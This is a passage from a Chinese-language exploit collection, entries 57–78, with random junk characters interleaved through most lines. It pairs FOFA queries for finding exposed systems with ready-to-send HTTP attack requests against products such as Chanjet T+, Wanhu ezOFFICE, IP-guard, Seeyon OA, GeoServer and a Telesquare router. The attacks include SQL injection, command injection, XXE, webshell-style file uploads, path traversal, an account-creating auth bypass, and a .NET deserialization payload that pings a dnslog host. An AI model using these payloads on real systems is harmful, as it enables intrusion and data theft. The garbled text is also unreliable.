7 U/ j1 R- ?1 ~! P "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
9 o. Z$ M& v3 w- o* i& [ "MethodName":"Start",
( H( w0 h- W7 i% V$ V "ObjectInstance":{0 p& c9 U$ F* z# G& `
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
]5 ]8 M" I4 R5 T6 D; } "StartInfo": {; U5 ]+ [/ x0 I. |' y+ }$ A
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, g$ P5 o% { k+ ^ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw": n& h u4 `3 w6 ]' X4 T
}) Z- |4 }2 {4 |8 z K5 O
}
9 B U/ c2 ?- w }
+ T) g: r% D$ @+ M( Z}
6 O% @( P+ \1 X# Q6 H7 k7 u7 H( q9 ?, R$ D7 D) D: G
7 Y3 F" G0 N/ D4 S
57. 畅捷通T+ keyEdit.aspx SQL注入 M" Q8 A( s1 i7 h& |
FOFA:app="畅捷通-TPlus"6 ?5 R: ]- V, p/ J, y, k8 J
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1* a6 v: M; E" n! T
Host: host
9 P* F- Q8 Z' `% [9 [User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 a1 z$ Z" f' s$ @- m Q& k) cAccept-Charset: utf-8
$ t- |6 `2 u% n# O7 dAccept-Encoding: gzip, deflate
# G4 o b4 S. R& u2 JConnection: close7 \1 l- O. C- z# p! `' ]( d2 N5 [
4 N1 v0 v Q( Z# E
# ?: g; W, o5 X0 M* X- D* X1 l
58. 畅捷通T+ KeyInfoList.aspx sql注入5 v/ ^7 O, U3 s
FOFA:app="畅捷通-TPlus"% y7 R0 l! ?6 ^& w x5 v9 o+ [
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
7 g5 h# `$ J+ s3 H2 [$ h; X' ZHost: your-ip
5 s$ ~, G; N; | d6 g( ~User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 \/ G2 O) w; `. a1 W7 n2 f
Accept-Charset: utf-8
% T# q7 z) `/ k% V7 U3 n \Accept-Encoding: gzip, deflate
! X: u' W2 X" M1 hConnection: close- R; \9 w, f* _0 _4 {+ N. l
2 R4 A; F! U+ B0 d( }1 O+ Q) F- n4 z) g% x* Y# w& B: a( b" K8 g
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 W4 X. Q7 N$ l9 A) m+ Z' D |9 u
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
; c+ K5 D2 B* J& Z% B* K1 bPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1# L- s0 ?7 e* F9 A: a
Host: 192.168.86.128:9090
4 `. Q/ O" u" ?% DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.369 f' D& O+ |. u; r' O" ~
Connection: close
2 y- u U/ q! L( HContent-Length: 1669! ]$ d3 \& R, E4 c1 x5 [
Accept: */*
% [+ D/ Z) o8 V, pAccept-Language: en2 k T; \( K% J( ], E* D) y
Content-Type: application/x-www-form-urlencoded
8 o( Y9 _$ d$ L, y9 \ D4 LAccept-Encoding: gzip6 |( ^+ G6 I5 K' l7 K
7 w7 @$ d' v" V- H8 y" G$ lPAYLOAD/ `1 S# J1 _7 ?
- N' ~% _& A u
# A" o" Z. g: B+ W& l5 w1 x60. 百卓Smart管理平台 importexport.php SQL注入9 c& x) K/ Y; s
FOFA:title="Smart管理平台"0 ^: M+ m! q/ P; [( X( \
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.11 `' n$ w# U' v4 W+ U
Host:
7 q; f4 J3 S6 E9 ?# W0 w+ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ y- N/ H; I9 p/ Z2 |8 q& k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 Z6 |6 }. D, \+ wAccept-Encoding: gzip, deflate
! D7 n* E6 A$ K2 YAccept-Language: zh-CN,zh;q=0.9
0 e9 d) d( ]( GConnection: close
- N" e. S& v6 j2 ~& ]2 K8 Y t7 B7 Z9 r( b
, D+ y8 ~) x G61. 浙大恩特客户资源管理系统 fileupload 任意文件上传6 c, O1 k. Z; o ~/ l
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
- b/ A/ \+ A! z& ZPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
9 f+ E$ F% ?4 sHost: x.x.x.x
m8 H" T9 f4 J6 Y1 e" P7 X" A2 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( {' `8 i: m+ c4 _+ o( M8 }
Connection: close
9 ]/ R1 x' s2 ?4 cContent-Length: 27* z( v! `7 Z- V
Accept: */** q6 q' T5 r4 l* j
Accept-Encoding: gzip, deflate
/ y: z+ Q; r% \Accept-Language: en2 k) O% ?$ P/ F$ ]! d
Content-Type: application/x-www-form-urlencoded+ R9 t& n! _3 \6 m8 Z9 q& @
% b/ O' I3 }3 J: ~( V3 O5 ?+ J
8uxssX66eqrqtKObcVa0kid98xa
. H: w) \7 ]9 l2 G+ a% e. P& B2 s* n' J( ?0 X
1 x* J3 H/ ^9 a7 h4 z1 P62. IP-guard WebServer 远程命令执行6 Z/ G0 T8 w- D* z1 d4 W5 v
FOFA:"IP-guard" && icon_hash="2030860561"8 B. u% ^6 ~: Z2 j% w' }+ |4 F( |6 q
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 g2 @% b+ R0 t% ?+ v* B7 x, \ [8 J& ^Host: x.x.x.x3 t- _, G% l6 C6 N5 }6 N, F" `
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
- r3 U3 e; l. c' T% tConnection: close
8 c+ J0 v/ o' K7 H* gAccept: */*
' u2 C$ u! e Y1 i' o! b# E+ bAccept-Language: en
. ?# A$ b0 C/ l w {! yAccept-Encoding: gzip
! r$ d6 N9 k; C9 k2 e8 i9 s) C! e; \
2 V- O- b. B2 `访问5 m. G0 i- V& |/ Z
# ?( A: M4 _3 Q% F3 J7 x6 `: XGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& G d) J l8 B8 v& @4 M
Host: x.x.x.x
" K$ I5 {/ x* ?; \. z+ L3 M0 J3 v$ ~+ r1 }1 J& q
. f! l3 I0 r/ y. s$ v
63. IP-guard WebServer任意文件读取
- M4 M2 Y6 v/ P+ h, K/ }! z& t; OIP-guard < 4.82.0609.00 V3 z& q {6 R
FOFA:icon_hash="2030860561"' w$ ^# J( F0 ~- Q/ z# e9 d
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1- K r% H, {6 i7 ~" w
Host: your-ip: L7 J1 [9 W! `6 Y* }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) l1 g k4 h# w- h/ P; z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& G3 {* W- l/ W# w; N( r/ @
Accept-Encoding: gzip, deflate
' n, ~5 w( L. n0 \5 a$ MAccept-Language: zh-CN,zh;q=0.9/ e; r( }- e' ?( t* L5 c& ~- U
Connection: close
% V4 |! U' V: V* L% qContent-Type: application/x-www-form-urlencoded3 b7 N0 c: l" a
% l- f5 ^/ F$ w4 e
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
8 I) P* ^! c# H% ~* w( {
% @4 l1 N/ x5 ~$ k; w) H& S64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 ~4 _0 w: ~7 j' J c2 mFOFA:body="/Scripts/EnjoyMsg.js"0 D8 Z6 {( `" ~& {+ \' O7 J# A4 N
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.10 h w: }* Y9 u
Host: 192.168.86.128:9001% y: G% g, S) M, d
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36* V) P, ^6 Q1 Z- R& }
Connection: close1 q. D# J7 G% H) Y/ h
Content-Length: 369
5 c+ O0 D7 _/ ~' Q& eAccept: */*4 y, I$ v" t8 i& p6 I. k
Accept-Language: en
}- u0 Q" Z% K& ~* wContent-Type: text/xml; charset=utf-8
! h2 Z0 f* k4 c; c/ WAccept-Encoding: gzip8 y6 B" C2 w. T* Z# {
, F6 r8 n9 m" t! \
<?xml version="1.0" encoding="utf-8"?>
& c6 k# T c4 ?7 k' w. c<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
5 Q9 q6 M2 [( h<soap:Body>
& i2 V4 Y- ^6 q5 B; u/ m8 H <GetOSpById xmlns="http://tempuri.org/">
1 t, Q' N7 O! c4 x- u <sId>1';waitfor delay '0:0:5'--+</sId>. }' L) k3 G5 u3 ?! E: t
</GetOSpById>
W( L7 `; I* h$ t; Z5 q$ k </soap:Body>
- L4 U9 v8 j. l+ U; h</soap:Envelope>! c( ]- D3 N7 y0 ]9 O" v/ T
* D5 o2 f8 E2 l
' Q& H4 ~6 S' {) j1 P& }65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
7 s! x. y8 M- T* ^7 U9 g+ mFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"% C8 c% f" W% }/ s
响应200即成功创建账号test123456/123456
2 C, _ h- j9 B6 a+ U6 BPOST /SystemMng.ashx HTTP/1.1
$ F. @5 Q: D4 r) C$ e. b, QHost:8 i. _/ E" L5 W2 T) Y- I$ R
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
3 O% V0 M3 ?( {9 [& I+ k VAccept-Encoding: gzip, deflate3 ?1 v7 a' C# G8 v& h
Accept: */*
: o q! ] S6 @- @- pConnection: close+ q5 n* T& E6 X3 }, j
Accept-Language: en1 r% o% k" ~/ l, p
Content-Length: 174" m9 ~% j8 b# X- l/ q
7 f2 q) s. o' c9 E% i b& a
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators0 n7 x9 U5 i Y d* ~: o
% z2 p: N/ p, j) D2 O
( E) |. k" ~6 }# b' I8 \66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* p0 k& H1 F: \' w9 z9 W2 NFOFA:app="万户ezOFFICE协同管理平台"6 E8 @ U1 b: r8 j9 S* E
" F7 \% W! F; W5 \; G: {GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
) V- p$ g* o2 T# WHost: x.x.x.x
. Y$ x% W5 u* e2 |+ E1 [8 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( i0 P/ W6 z ?! T: ?5 K* S
Connection: close
5 W7 m' q- O$ s: cAccept: */** @; q; D- e5 j
Accept-Language: en
( T R( n/ X3 DAccept-Encoding: gzip2 `# K) ^$ v h
; |0 J* k* w. Q1 p4 M& ]( j0 ^
7 c6 |+ T; [; A" ~' i
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
4 v7 F& t- N1 M' i f( F, `) K- W; c5 a% \1 B* [
67. 万户ezOFFICE wpsservlet任意文件上传
9 ?& { ]: p! p" u: W PFOFA:app="万户网络-ezOFFICE"7 u8 Z, J% h6 z5 b+ ?) l0 w
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型4 ]" @+ P+ _) r' h$ R# F0 T6 a' f
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
$ m$ w+ o6 w9 [" [+ A7 OHost: x.x.x.x8 H; B3 i# J; v+ B3 p+ ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
# {; i' u3 }# p- ?9 N( IContent-Length: 173
( |8 q3 ?/ b+ S# l: p+ k/ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" x* @4 f3 }: k& u3 r" q, K) Q
Accept-Encoding: gzip, deflate
: T& t. S8 ?$ G" HAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
& e% ~7 E# s0 W- G) iConnection: close/ h3 E& p! ?# H$ {
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp6 Y( `1 |: Z0 V
DNT: 1
* m: ], p$ M4 ^- w% a2 R, ]Upgrade-Insecure-Requests: 1
5 t% X4 d* I9 E8 h- p- p
* R7 q- j: o8 k6 ^7 w* J--ufuadpxathqvxfqnuyuqaozvseiueerp) G# b9 c: t4 E. }$ ?; C9 M9 ]
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"8 n0 l+ ]2 s3 Z+ a8 W, E; ]& q
5 |9 i8 {; P8 ~2 [<% out.print("sasdfghjkj");%>) }) ]% q6 r( y3 r1 k4 o8 r# L' n
--ufuadpxathqvxfqnuyuqaozvseiueerp--
; T' Z7 x: c- F. }9 a4 l, c, h! {0 M5 ?$ T" h7 _
/ b" v# O0 u# E3 t2 X6 o
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
0 v+ R1 J" v; E
# n& f6 t; u3 P& D& @8 f) s68. 万户ezOFFICE wf_printnum.jsp SQL注入5 [: `1 f) o, T4 S3 q
FOFA:app="万户ezOFFICE协同管理平台"
( U( o* @& }% D# ?, \GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.14 R& H% s2 \# [& {! h6 _; K2 f* m
Host: {{host}}" u6 L3 i+ X' [9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
8 F) ]1 Q1 m# w9 s9 N- S8 bAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8, |7 _, K+ H7 ?0 J
Accept-Encoding: gzip, deflate
: o. l4 P0 I/ A4 \' s9 MAccept-Language: zh-CN,zh;q=0.9* o, N; V' g [7 Q' N3 N8 M( t
Connection: close) H' M' h, a1 L! W! z" t
0 M, q5 W( i4 W3 K7 C- G5 c6 P
. s' g: X" R5 U) `6 ~- _
69. 万户 ezOFFICE contract_gd.jsp SQL注入6 Y& t1 X8 B7 A N" f
FOFA:app="万户ezOFFICE协同管理平台" T" y. E. x/ L3 k4 }0 n' u L
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
3 d/ K% e; t' g+ h* U Y, hHost: your-ip
$ g4 R& i( B# K; [User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 ]1 v; D! Z* C) \
Accept-Encoding: gzip, deflate
' y% w8 C: r3 M) r6 n" g5 G$ rAccept: */*
/ z% p5 X2 @/ O1 @Connection: keep-alive& z3 H) K6 R: |+ q9 w4 i- b2 [! h
8 M' q+ e! j7 q$ `+ S5 C$ _' m
$ ]( j) L, O( {. y) Z70. 万户ezEIP success 命令执行
) J/ G, h8 [+ J# u! ^" z0 OFOFA:app="万户网络-ezEIP"
1 b2 u8 Y4 f# B# W$ j( v ]POST /member/success.aspx HTTP/1.1! t3 K1 N3 e4 E" ~. a6 c* \ D! z* m
Host: {{Hostname}}
: `4 f1 I& `: p1 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& Y: w7 R0 t$ S* ^5 x, wSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
, `4 o9 Y% b2 P- S) A: nContent-Type: application/x-www-form-urlencoded5 t# g9 s& ~2 `- K! Q1 _
TYPE: C. j# X4 A0 t% M
Content-Length: 16702
8 W" G0 g; \7 o6 a3 I1 |) o
9 I* U: r3 ~( l2 I__VIEWSTATE=PAYLOAD
! E0 z! Z" {% [9 t! D, U5 o9 M5 u. j( G
' f* [' y5 H$ A/ \ |# B) m
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 q2 z) h* R* b" tFOFA:body="PM2项目管理系统BS版增强工具.zip" _9 [! S1 S+ f+ _% ~* R' ?0 w
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1$ L% m% d- u) P; n* Z$ c
Host: x.x.x.xx.x.x.x
& u7 E, t* F/ b+ H C$ nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36: u/ W6 s! z$ {6 U* v
Connection: close1 [5 w7 G7 ?0 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ K1 f% B4 B- P
Accept-Encoding: gzip, deflate3 Y: x+ V% p: b3 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 _+ i0 T0 K7 q' Y% T) [Upgrade-Insecure-Requests: 1
3 ]* m8 Z1 V F% F% u$ }( @& G+ j! b5 ~& L
0 ]7 L6 g5 P {5 x. h Q# P3 \72. 致远OA getAjaxDataServlet XXE! T0 d2 a* c4 d
FOFA:app="致远互联-OA"/ o& p# M$ {, d! |$ j
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1. p( r+ @$ A+ Q- s9 ]
Host: 192.168.40.131:8099
, q3 s$ m- V3 qUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.369 g, Z2 w4 F$ X8 G
Connection: close
& {) e* c8 c- h1 T4 B; f+ A, \Content-Length: 583
; j5 l# I% b) b8 xContent-Type: application/x-www-form-urlencoded7 v) G/ x) e& M3 \
Accept-Encoding: gzip5 [" L$ x; b) R7 I8 s
+ S3 e9 Z6 o5 b$ W$ F0 l- w
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 }8 u5 d1 o& M$ d! x: x8 ]
7 O% i/ |2 c' `7 s+ a, Q5 x+ A, Z4 w3 t# w- |* N' Q9 i' W
73. GeoServer wms远程代码执行
- S* [# H0 }, _( ^$ iFOFA:icon_hash=”97540678”6 S9 k9 r4 r$ ^
POST /geoserver/wms HTTP/1.1
8 i* K2 H; g- D) i' {Host:+ X) [/ f* o( k2 G6 T+ l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) p8 K. l; r. L, [Content-Length: 1981
1 B( K; V4 d9 J& D. H+ f: JAccept-Encoding: gzip, deflate
1 k% q4 I8 |; P+ w( e* r6 _Connection: close. @+ p( r. C/ r# E7 m& S
Content-Type: application/xml
4 f6 O ~9 T3 A3 cSL-CE-SUID: 3' H( e; M, \9 A
) m! K. p; H7 ~; D
PAYLOAD1 k6 Z/ _9 Y. [/ R: n4 y
& l9 o5 A E2 J/ {/ `
8 o$ F+ w3 T* c; w% c74. 致远M3-server 6_1sp1 反序列化RCE
2 [; s/ h; w; B6 G& A; FFOFA:title="M3-Server"
& F1 s9 u5 C, s8 ? PPAYLOAD
: C( Q+ h) |% B( Y Z) G) v
/ N0 r$ L8 q; i. z75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE8 H5 Y- v9 ~' \! N. R. J7 K; |
FOFA:app="TELESQUARE-TLR-2005KSH"2 Y6 T: |' h. A
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1# t( w" @% ?8 g3 t6 n. m
Host: x.x.x.x3 Y0 ~0 w& z1 E2 A; j7 B7 _- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 a& [( v- k! T5 z( U: o4 f
Connection: close
- D; I/ \0 q8 W4 G" \9 h/ P* W% RAccept: */*; i6 \# R' K+ \' j$ `5 ~# P7 ?4 |
Accept-Language: en6 U# T* C% _# u+ D+ q# R
Accept-Encoding: gzip/ ?+ q* h0 X+ G0 R. B" F& G
: p# w" K7 }6 B( }; P: ?
& i0 I0 k! u7 N% ]5 ~4 z6 VGET /cgi-bin/test28256.txt HTTP/1.13 k8 ]9 i# p, H! L x$ W& p- ^
Host: x.x.x.x
# ~1 S" g$ _$ D
[5 [6 U, O: z- Z8 o1 S2 E( n0 P+ P
76. 新开普掌上校园服务管理平台service.action远程命令执行
1 v. E% n) g) g8 u; xFOFA:title="掌上校园服务管理平台"! c/ ^2 y5 A C5 ~' I
POST /service_transport/service.action HTTP/1.1
. G/ L, ~) N7 C: n; ZHost: x.x.x.x
' f% d5 e/ P+ s4 x7 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.00 I- b/ i' z3 D. ?, b
Connection: close# J9 q' s0 T# `& H8 L
Content-Length: 211: d W& Q% E& Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; H" F/ {4 V( v; m1 _/ {+ `Accept-Encoding: gzip, deflate( [. F7 s w3 `, i: w' S3 t. i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! c4 N3 g& @- I2 W0 o \Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A47 w J5 v$ c3 C5 x3 {6 Z- k! h
Upgrade-Insecure-Requests: 1# l2 n" p- l! \0 A, L$ }% D
: R8 S' _# m% Y( C$ {, Y$ e
{
! S# k# o" G6 T3 { W9 _"command": "GetFZinfo",! ?" V- t: N4 U3 ]7 U( I m" x) ~
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
2 v7 B+ p7 ]8 [; g+ [+ v, Z6 ]/ Q ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
4 I4 J+ V. k9 ~% Q6 O}4 r+ e& Y0 [( A4 g. F- i
# E" c, I2 s# x' S, a
1 y. ]6 C; F' T& o, oGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1) k4 U) Z# R* h7 f8 V
Host: x.x.x.x
! F1 L0 X+ \% ]3 K- h! i, E; _
* ^1 Z( m8 ]: K8 B" C4 {0 ^
' ?0 I- {* Q/ N0 k
2 Z e1 e$ {6 K3 c* v0 p# u77. F22服装管理软件系统UploadHandler.ashx任意文件上传
. r o2 W8 `2 ]% @ D7 EFOFA:body="F22WEB登陆"
" J4 ]. a; o4 t$ w' [2 [ W0 xPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1; |2 M/ w% ~. z& s) m/ _( x: j
Host: x.x.x.x8 }; w( r/ Q4 o2 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* `) O/ \/ X3 N! P$ QConnection: close
& k( T8 p$ y- _! w* IContent-Length: 433
$ r" a* ~. V7 DAccept: */*' h' S: {' G+ n8 M5 S2 Z5 Q# M
Accept-Encoding: gzip, deflate) ~" q- ~) \ i2 O% A7 t
Accept-Language: zh-CN,zh;q=0.9$ F1 I! q% D3 d0 b! U
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix! H, w. W" I4 b
/ v+ n' E) H( L/ ]+ |, a9 t$ v------------398jnjVTTlDVXHlE7yYnfwBoix
8 E0 c: j6 x- H2 D8 O3 X8 X! \Content-Disposition: form-data; name="folder"
% V6 x; p8 B/ f
7 M" D- m- X) L8 V. I0 ?/upload/udplog H' n- X. z8 S) [
------------398jnjVTTlDVXHlE7yYnfwBoix3 i; y# z! y" Q. c4 v3 M2 W
Content-Disposition: form-data; name="Filedata"; filename="1.aspx": b. U* c6 a, E4 @6 T9 r
Content-Type: application/octet-stream; R) {# C) L/ q1 ?7 j
# v* f5 o: d& ~5 u+ Xhello1234567
. e( A- U- H! a2 d E& c------------398jnjVTTlDVXHlE7yYnfwBoix3 W) d$ @6 t/ }9 A) K! u7 e
Content-Disposition: form-data; name="Upload". M; L+ S b3 `( v
& z# R3 B9 \& o; f$ f) XSubmit Query; K8 o$ K1 P* V! f( B' }
------------398jnjVTTlDVXHlE7yYnfwBoix--
# x$ X2 T; G. }0 \1 Z j. U7 q! G/ e; G4 F$ Y/ Z: u3 w. Y
* u# \: s5 a8 [/ [1 k" J4 q78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
3 z0 ]; a( R3 c+ I2 c, VFOFA:icon_hash="2001627082": u% C! a) l( |
POST /Platform/System/FileUpload.ashx HTTP/1.1
5 O7 D* K) ~+ N6 `3 W# iHost: x.x.x.x
, o% E- W5 x5 @7 v# v+ QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& P+ B( q. v* v+ \( G
Connection: close
0 A$ Z- h/ H- t7 e! y# UContent-Length: 3365 x6 U# r/ i+ Y
Accept-Encoding: gzip
1 L; {! A7 f! C" d/ eContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l/ i- l+ Q/ A' J' b. A$ O9 c
\# j0 [& s7 Q" ^2 {+ M, X------YsOxWxSvj1KyZow1PTsh98fdu6l
) T7 H) {8 V1 ^0 ], `/ ]Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
1 j3 J* x6 Q8 Q, PContent-Type: image/png
, V/ K3 U( I1 p" P* U- t* L) J, I. f( l# g& D+ S& y' x
YsOxWxSvj1KyZow1PTsh98fdu6l
$ Q+ F$ k$ [: c! j------YsOxWxSvj1KyZow1PTsh98fdu6l
$ u" h) F: t! e/ p v* O3 l$ SContent-Disposition: form-data; name="target"
) f! N( ?5 q1 q" ^5 `* a; v: k* L1 K3 ^8 I3 ?! ~: s
/Applications/SkillDevelopAndEHS/
; Q/ z; ] g* v% w2 F------YsOxWxSvj1KyZow1PTsh98fdu6l--2 H/ u: y0 \: C! P9 D# {
3 x7 y8 n0 S, v& c0 q; N9 W* \! ~+ i5 o) U N# E# s+ T) G. m/ O
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1, p% u7 F9 m9 G$ G- @
Host: x.x.x.x
